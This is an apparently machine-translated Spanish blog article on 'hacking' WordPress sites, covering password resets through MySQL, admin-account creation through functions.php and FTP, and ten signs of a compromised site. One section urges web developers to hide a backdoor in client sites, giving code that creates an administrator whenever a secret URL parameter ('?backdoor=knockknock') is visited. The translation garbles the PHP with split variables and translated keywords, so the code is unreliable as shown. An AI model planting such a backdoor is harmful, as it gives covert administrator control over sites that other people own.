Cómo piratear un sitio web de WordPress, la guía completa

Cómo hackear un sitio web de WordPress, la guía completa


¡No aprobamos, aprobamos ni alentamos ningún comportamiento ilegal o malicioso! El propósito de este artículo es explicar cómo piratear o recuperar el acceso a un sitio de WordPress que le pertenece, o que tiene derechos para editar, administrar y acceder. Hagas lo que hagas, lo estás haciendo por tu cuenta. No somos responsables de sus acciones. Esta guía sirve solo con fines educativos..

Los métodos descritos lo ayudarán a recuperar el acceso al sitio incluso si ya no tiene una cuenta, pero requerirán información sobre el sitio y no lo ayudarán a piratear ninguna instalación aleatoria de WordPress.

En esta guía, estamos a punto de mostrarle:

  • Cómo hackear un sitio web de WordPress
  • Cómo crear una puerta trasera en WordPress
  • Cómo crear una nueva cuenta de usuario a través de FTP
  • 10 señales de que su sitio de WordPress está pirateado

Cómo hackear un sitio web de WordPress, la guía completa

Situaciones en las que puedes ayudarte

Si se encuentra en una de las siguientes situaciones, nuestros métodos lo ayudarán a recuperar el acceso:

  • olvidó el nombre de usuario o la dirección de correo electrónico
  • la opción de restablecer contraseña no funciona en el servidor de alojamiento
  • los correos electrónicos de restablecimiento de contraseña no llegan
  • ya no tienes acceso a la dirección de correo electrónico de la cuenta
  • conoce el nombre de usuario y la contraseña, pero la combinación simplemente no funciona

Para usar los métodos que se describen a continuación, necesitará solo uno de los siguientes:

  • Acceso FTP al servidor, o
  • cPanel acceso al servidor, o
  • acceso a la base de datos MySQL y la capacidad de conectarse remotamente

Método # 1 – la forma MySQL

Use este método para cambiar la contraseña (o nombre de usuario si es necesario) de un usuario existente o para crear una nueva cuenta. Necesitará acceso a cPanel o acceso directo de MySQL a la base de datos del sitio. Comencemos cambiando la contraseña de un usuario existente.

Si usa cPanel, inicie sesión (siempre se puede acceder a cPanel a través de https://yoursite.com:2083 enlace), ubicar y abrir phpMyAdmin. La lista de bases de datos y tablas está a la izquierda.. Estás buscando la tabla que termina en _usuarios. Probablemente sea wp_users, pero si tiene más de un sitio de WordPress instalado en el servidor, debe encontrar el correcto.

La tabla correcta tendrá el usuario que desea editar en ella. Siga el mismo procedimiento si se está conectando a MySQL a través de un cliente externo como SQLyog. Una vez que localice la tabla y el registro de usuario real, es hora de cambiar la contraseña.

Como probablemente ya haya descubierto, la contraseña se guarda en el contraseña de usuario campo, hash usando el algoritmo MD5. Abre el generador MD5 en línea ingrese la contraseña que desea usar y haga clic en “Hash”. Copie la cadena generada y reemplace la contraseña original con eso. En phpMyAdmin, puede editar el campo haciendo doble clic en él. El procedimiento es similar en otros clientes MySQL. Guarde los cambios e inicie sesión en WordPress con su nueva contraseña.

Tabla de usuarios de WP

Los nombres de usuario, las contraseñas hash y los correos electrónicos se almacenan en wp_users tabla de base de datos

Todavía en el método # 1: crear un nuevo usuario

Crear un nuevo usuario es un poco más complicado pero manejable en menos de un minuto. Crea un nuevo registro en la tabla de usuarios y complete: user_login, user_pass (hash, utilizando la función MD5 descrita anteriormente) y user_email. Todos los demás campos pueden permanecer vacíos; No importan. Guarda el nuevo registro. Una vez guardado, MySQL le dará una identificación única. Es el número en el campo ID. Recuerdalo.

Ahora ve a _usermeta mesa. Recuerda, el prefijo de la tabla debe ser el mismo que el de los usuarios. Por ejemplo wp_users y wp_usersmeta. Si el prefijo no es el mismo, está editando la tabla incorrecta (de alguna otra instalación de WP) y la nueva cuenta no funcionará. Crearemos dos nuevos registros. Ignora el umeta_id campo para los dos. Conjunto ID_usuario campo al valor que acaba de recordar (el nuevo valor de ID en la tabla de usuarios). Para el primer conjunto de registros meta_key a wpct_user_level y meta_value a 10. Para el segundo meta_key a wpct_capabilities y meta_value a a: 1: {s: 13: "administrador"; b: 1;}. Guarda los dos. Ya ha terminado: inicie sesión!

Método # 2 – la forma functions.php

Este enfoque se puede utilizar editando functions.php a través de cPanel o utilizando un cliente FTP para hacerlo. Si usa cPanel, busque el Administrador de archivos y ábralo. Primero, tenemos que encontrar la carpeta del tema activo.

Ir public_html / wp_content / themes carpeta. Si inmediatamente ves tu tema y sabes cuál es, genial. Abre su carpeta y comienza a editar funciones.php. De lo contrario, abra el sitio, haga clic derecho en cualquier lugar, seleccione “Ver código fuente”. Luego presiona Ctrl + F y comienza a escribir / temas / pronto tendrá muchas URL resaltadas y reconocerá el nombre de la carpeta del tema activo.

Encuéntrelo en la estructura de archivos, ábralo y comience a editar funciones.php. Copie / pegue el siguiente código al final del archivo. Cuidado con el cierre ?> Etiquetas PHP si las tienes. Tienen que estar en la última línea. Así que inserta el código antes que ellos.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (array ('ID' => $ user_id, 'nickname' => $ new_user_email));

$ usuario = nuevo WP_User ($ user_id);
$ usuario-> set_role ('administrador');
}

Edite solo las dos primeras líneas del código para reflejar su nueva cuenta. Si ya hay un usuario en WP con ese correo electrónico, no se creará una nueva cuenta, así que asegúrese de que sea nueva. Cambie la contraseña también: no se deje hackear por script kiddies. Después de guardar el archivo, simplemente abra su sitio, se ejecutará el código, se creará una nueva cuenta con privilegios de administrador y podrá iniciar sesión con él.

Después de hacerlo, recuerde eliminar el código de funciones.php.

Otros métodos de piratería

Al conocer la contraseña de FTP, cPanel o MySQL, está demostrando que tiene acceso legítimo al servidor y, por lo tanto, también debe tener acceso a las instalaciones de WordPress. Si no tiene ninguna de esas cuentas, entonces no está haciendo nada bueno (piratear sitios de otras personas), y eso no es bueno!

Recuerde que obtener acceso no autorizado a cualquier computadora, sitio o servidor es un delito grave y se trata rápidamente en la mayoría de los países.

Si tiene miedo de que su sitio de WordPress pueda ser pirateado, consulte esta página con el escáner de seguridad gratuito de WordPress. Si no tiene tiempo para configurar su blog, déjenos hacerlo por usted.

Cómo crear una puerta trasera en WordPress

Cuando la puerta principal está cerrada, puede probar la puerta trasera. Esto puede sonar como una forma maliciosa de usar el código para ingresar al sitio sin tener acceso a él, pero en realidad hay momentos en los que necesita controlar su propio sitio si alguien lo robó.

Si está creando sitios web para otras personas algo que usted hace, tarde o temprano habrá un cliente que se negará a pagarle por su trabajo; un cliente que eliminará su información de inicio de sesión y tomará el control de todo lo que ha hecho. A veces, será suficiente crear un nuevo usuario a través de FTP o restablecer una contraseña. Cuando eso no es suficiente, es posible que desee hackear su camino de regreso o crear un acceso de puerta trasera a sus páginas de administrador.

Pero si decidiste ocultar un pequeño fragmento de código en tu entorno de WordPress, podrías ahorrarte algo de dignidad y obtener acceso al sitio de WordPress con privilegios de administrador. Y ahí es donde comienzan los juegos..

No importa cuántas veces este ladrón elimine su información o restaure una copia de seguridad en un servidor que probablemente posea, existe la posibilidad de que no sepa nada sobre las entradas de puerta trasera. Si lo hiciera, probablemente ni siquiera necesitaría tu ayuda para configurar WordPress, ¿verdad??

Crea una puerta trasera:

OK, suficiente con la charla; aquí hay un código que necesitará para hacer el trabajo:

  1. Abrir archivo functions.php
  2. Copiar / Pegar el siguiente código:
  3. add_action ('wp_head', 'wploop_backdoor');
    función wploop_backdoor () {
    If ($ _GET ['puerta trasera'] == 'knockknock') {
    require ('wp-includes / Registration.php');
    If (! Username_exists ('nombre de usuario')) {
    $ user_id = wp_create_user ('nombre', 'pasar');
    $ usuario = nuevo WP_User ($ user_id);
    $ usuario-> set_role ('administrador');
    }
    }
    }
    ?>
  4. Guardar cambios

Si deja el código tal como está, todo lo que tendría que hacer para crear un nuevo administrador en el sitio es visitar http://www.yourdomain.com/?backdoor=knockknock

Después de cargar la página, su nuevo nombre de usuario es “nombre” y contraseña “pasar”.

Por supuesto, puedes cambiar eso en el código arriba cambiando “nombre” y “pase” a lo que quieras También puede cambiar el enlace a su puerta trasera cambiando ‘puerta trasera’ y / o ‘knockknock’ a cualquier cosa que se le ocurra.

Pruebe la función: no solo es divertida, sino que realmente puede ayudarlo en algún momento en el futuro cuando esté a punto de crear un sitio web para alguien en quien no pueda confiar por completo. También debe subir de nivel sus habilidades de WordPress y blogs.

Cómo crear una nueva cuenta de usuario a través de FTP

Crear nuevas cuentas de usuario en WordPress es muy fácil. Como administrador, necesitas navegar a la página de administración de usuarios donde puede crear una nueva cuenta para cualquier rol de usuario. Eso se puede hacer en cuestión de segundos y un usuario recién creado puede iniciar sesión inmediatamente con un nombre de usuario y contraseña dados.

Pero, ¿qué sucede si pierdes el acceso a tu administrador de WordPress? Las cosas pueden complicarse un poco, pero no se preocupe: tenemos una función para usted que puede salvar su vida de administrador.

Si otro administrador eliminó su cuenta, si eliminó a todos los usuarios de la base de datos por error, utilizó un complemento que no funciona correctamente o fue pirateado, aún puede recuperar el control. En ocasiones, es posible que solo pueda acceder a su servidor FTP, mientras que el HTTP estará fuera de su alcance y deberá crear un nuevo administrador. Si bien ese podría ser un caso raro, la siguiente función lo salvará.

Para crear una nueva cuenta fuera del entorno de administración de WordPress, todo lo que necesitará es un acceso FTP a su sitio. Como administrador, debe tener toda la información necesaria para iniciar sesión en su servidor y puede crear rápidamente una nueva cuenta creando una nueva función en su tema.

Cree una nueva cuenta de usuario a través de FTP:

  1. Abra el cliente FTP y conéctese a su cuenta
  2. Navega a wp-content / themes
  3. Abra la carpeta del tema que está utilizando.
  4. Busque el archivo functions.php y edítelo
  5. Copie y pegue la siguiente función:
  6. función admin_account () {
    $ user = 'Nombre de usuario';
    $ pass = 'Contraseña';
    $ email = '[email protected]';
    if (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ usuario, $ pase, $ correo electrónico);
    $ usuario = nuevo WP_User ($ user_id);
    $ usuario-> set_role ('administrador');
    }}
    add_action ('init', 'admin_account');
    
  7. Cambiar nombre de usuario, contraseña y correo electrónico a algo único
  8. Guardar cambios

Asegúrese de que el nombre de usuario, la contraseña y la dirección de correo electrónico que configuró en la función sean únicos o de lo contrario, la función no funcionará correctamente. Una vez que haya guardado los cambios, habrá terminado y podrá navegar a su panel de inicio de sesión de WP. Use nueva información para volver a iniciar sesión y una vez que haya verificado la cuenta, puede eliminar la función del archivo functions.php.

La función que se muestra arriba crea una cuenta de administrador, pero puede modificarla fácilmente para crear una cuenta con cualquier otra función de usuario. Simplemente cambiar el papel en el 8th fila del código al editor, autor, colaborador, suscriptor o cualquier otra función de usuario que haya creado.

Desafortunadamente, si ha perdido su cuenta de administrador, también ha perdido todas las publicaciones escritas con ese nombre de usuario. Es por eso que siempre debe mantener una copia de seguridad que pueda recuperar fácilmente. Si estás leyendo esto mientras tienes tu cuenta de administrador, tome esto como un recordatorio para crear una copia de seguridad de inmediato y marque este artículo en caso de que necesite crear una cuenta fuera de WordPress en el futuro.

10 señales de que su sitio de WordPress está pirateado

WordPress es una gran plataforma de blogs. Hay millones de usuarios y parece que el número está creciendo rápidamente todos los días. Las personas incluso tienden a transferir sus sitios web creados en otros sistemas de administración de contenido a este sistema de código abierto con más frecuencia de lo que piensas. Y, si bien esto es bueno, esto significa que los hackers también pondrán WordPress en un lugar número uno cuando intenten invadir sitios aleatorios.

Por lo general, si te piratean, lo sabrás al instante. Su sitio se volverá inaccesible; no podrá iniciar sesión y, a veces, un hacker incluso dejará un mensaje en la página principal. Pero la mayoría de las veces, puede que ni siquiera te des cuenta de que algo ha cambiado. En esta parte del artículo, estamos a punto de mostrarle varias señales que podrían mostrarle que su sitio de WordPress fue pirateado y algunas soluciones al problema.

1. Inicio de sesión fallido

Este signo es bastante evidente. Si ha utilizado una combinación de nombre de usuario y contraseña durante un tiempo sin tener problemas, puede sospechar si de repente WordPress no reconoce su cuenta. Si un hacker tiene que iniciar sesión en su sitio, es probable que cambie rápidamente sus privilegios de administrador.

Tal vez él tuvo que cambiar su contraseña o eliminar completamente su cuenta. Antes de comenzar a entrar en pánico después de la primera vez que WordPress le envía un mensaje de usuario / contraseña incorrectos, tenga en cuenta el hecho de que puede haber ingresado una combinación incorrecta o de haber activado el botón de bloqueo de mayúsculas.

Solución: Intente recuperar la contraseña por correo electrónico o use otra cuenta para volver a iniciar sesión. Para asegurarse de que su inicio de sesión permanezca seguro, le recomendamos instalar Login Ninja plugin para WordPress.

2. Se agrega contenido malicioso a su sitio

El sitio contiene una advertencia de malware

Si comienza a notar contenido desconocido en su sitio, puede comenzar a preocuparse. Cuando tengan la oportunidad de acceder a su área de administración, los piratas informáticos podrán cambiar su núcleo y sus archivos de temas y complementos. Eso significa que pueden cambiar lo que quieran.

Mientras que algunos piratas informáticos modificarán drásticamente el aspecto de su sitio y tal vez incluso deletreen que fue pirateado, los otros serán mucho más sutiles al respecto.

Solución: Intente buscar contenido oculto en el código del sitio web. Puede haber enlaces a sitios maliciosos que los piratas informáticos plantaron en el pie de página de su sitio, o pueden haber instalado ventanas emergentes que se abrirán regularmente a sus clientes. Use Security Ninja para escanear su sitio o monitorear continuamente su sitio en busca de tales problemas.

3. Visitas sospechosas

Si no está rastreando su sitio web, debe comenzar a hacerlo de inmediato. Una forma sencilla de hacerlo es usar Google Analytics que, entre muchas otras funciones, puede decirle cuántas visitas recibe y de dónde provienen esas visitas. Después de un tiempo, conocerá su sitio web. Eso significa que sabrá de dónde provienen las visitas, sabrá cuándo lanzará una nueva campaña y cuándo se lanzarán nuevos enlaces de promoción..

Pero si de repente nota que su sitio está recibiendo una gran cantidad de nuevas visitas del dominio sospechoso, querrá investigar esto más a fondo porque su sitio podría ser pirateado. Por lo general, ese tipo de visitas generará una tasa de rebote del 100%, lo que significa que solo se accedió a una página. Los hackers usarán frecuentemente sistemas automatizados que conducirán a otros sitios malos al suyo. Ya sea que se ejecute el código incorrecto en su sitio o que se haya convertido en parte de una red de correo no deseado, las cosas pueden ponerse serias y tendrá que revisar su sitio en busca de código malicioso.

Solución: Utilizar Herramientas de Google Webmasters para encontrar dominios sospechosos

4. Una caída repentina en el tráfico

Navegación segura Estado del sitio

A diferencia de la última señal mencionada de ser pirateado, esta podría alertarlo porque de repente hay una disminución en el número de visitas. En lugar de recomendarle nuevas visitas, un hacker puede enviar visitas fuera de su sitio. Esto podría suceder porque un hacker redirigió su sitio a otro. La otra razón para obtener menos visitantes es que Google puso en la lista negra su sitio. Esta acción mostraría un mensaje a cada usuario que puede optar por no abrir su sitio porque está infectado.

Solución: Usa Google Estado del sitio de navegación segura para verificar si su sitio está marcado como inseguro y actualmente es peligroso visitarlo.

5. Los resultados del motor de búsqueda son extraños

Si no ha notado ningún cambio en su sitio, pero descubre que los resultados de búsqueda en Google y otros motores de búsqueda son extraños (muestran diferentes títulos y otros metadatos), esto podría ser una clara señal de un sitio pirateado. Un pirata informático podría haber cambiado su contenido de una manera que solo puede ser visible para un experto. Aún así, el cambio sería visible en los resultados del motor de búsqueda.

Solución: Verifique su sitio con Herramientas de Google Webmasters, y verifique si su sitio fue pirateado con esto herramienta gratuita en línea.

6. No puedes enviar / recibir correos electrónicos

Una vez que un hacker tenga acceso a su sitio, probablemente querrá usa tu servidor para enviar spam a todos los demás. Cuando descubres que no puedes enviar o recibir nuevos correos electrónicos de tu WordPress, esto puede ser una clara señal de que has sido pirateado. Revise su correo electrónico una vez más, luego verifíquelo con su proveedor para asegurarse de que no haya ningún error.

Solución: Prueba tu WordPress función de correo con este complemento gratuito.

7. El sitio no existe

Servidor no encontrado

Hay ocasiones en que los piratas informáticos no acceden a su sitio para plantar códigos maliciosos, redirigir a los usuarios o usar su correo electrónico para correo no deseado. Algunas veces, todo lo que querrán hacer es bloquear su sitio. En raras ocasiones, un hacker eliminará con éxito todo de todo el servidor. Por eso es importante que aloje sus archivos en una empresa de alojamiento de renombre que se encargará de la seguridad y también mantendrá copias de seguridad diarias o al menos semanales de su sitio web. Es una buena práctica que también haga sus propias copias de seguridad de vez en cuando para que el sitio se pueda restaurar rápidamente.

Solución: Instale uno de los mejores complementos para la gestión de copias de seguridad en WordPress.

8. archivos sospechosos

Similar al contenido malicioso que se puede agregar a los archivos existentes, un hacker podría plantar archivos adicionales en cualquier lugar dentro de su carpeta raíz. Es bueno saber cómo manejar WordPress, pero si no tiene tanta experiencia, debe tener una herramienta de seguridad a su disposición que pueda verificar todos sus archivos y actividades. Recientemente, revisamos Security Ninja, que es una herramienta perfecta para verificar todos sus archivos de WordPress.

Solución: Intente buscar archivos que no pertenezcan a su instalación de WordPress. Use Security Ninja para escanear su sitio regularmente y encontrar esos archivos automáticamente. Luego, elimine los archivos o elimine el código malicioso de los archivos infectados. No olvides el complemento Core Scanner para Security Ninja.

9. Nuevos miembros

Dependiendo de su sitio, puede ser el único capaz de agregar nuevos miembros. En ese caso, un correo electrónico que le informa sobre los nuevos usuarios registrados puede activar una alarma. Si hay otros administradores que tienen la capacidad de agregar nuevos miembros, consulte con ellos sobre actividades sospechosas.

Solución: Cambie la URL de inicio de sesión con un complemento gratuito, limite el acceso a su página de inicio de sesión de WordPress utilizando el archivo .htpasswd y use Login Ninja para proteger su formulario de inicio de sesión todo el tiempo.

10. Consulte los eventos programados en su servidor

A veces, un hacker no le hará nada a su sitio web una vez que encuentre su camino., saldrán de los eventos programados lo que puede dañar su sitio en algún momento en el futuro. Esta técnica es peligrosa porque un hacker puede dejar a la víctima inexperta sin idea al principio. Puede estar infectado y no saber nada al respecto..

Solución: Verifique sus trabajos CRON en un servidor que esté utilizando y asegúrese de que no haya tareas programadas sospechosas.

Terminando

Esperamos que este artículo lo ayude a administrar incluso un sitio de WordPress más seguro, y que lo ayude a recuperar el acceso a él en situaciones difíciles. Y incluso si tu sitio está limpio, no lo des por sentado.
Siempre asegúrese de que su blog sea lo más seguro posible. Sugerimos complementos de seguridad para WordPress que pueden salvarte la mayoría de las veces. Aún así, no seas el que use una contraseña insegura, y ten cuidado al piratear tu propio sitio de WordPress.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map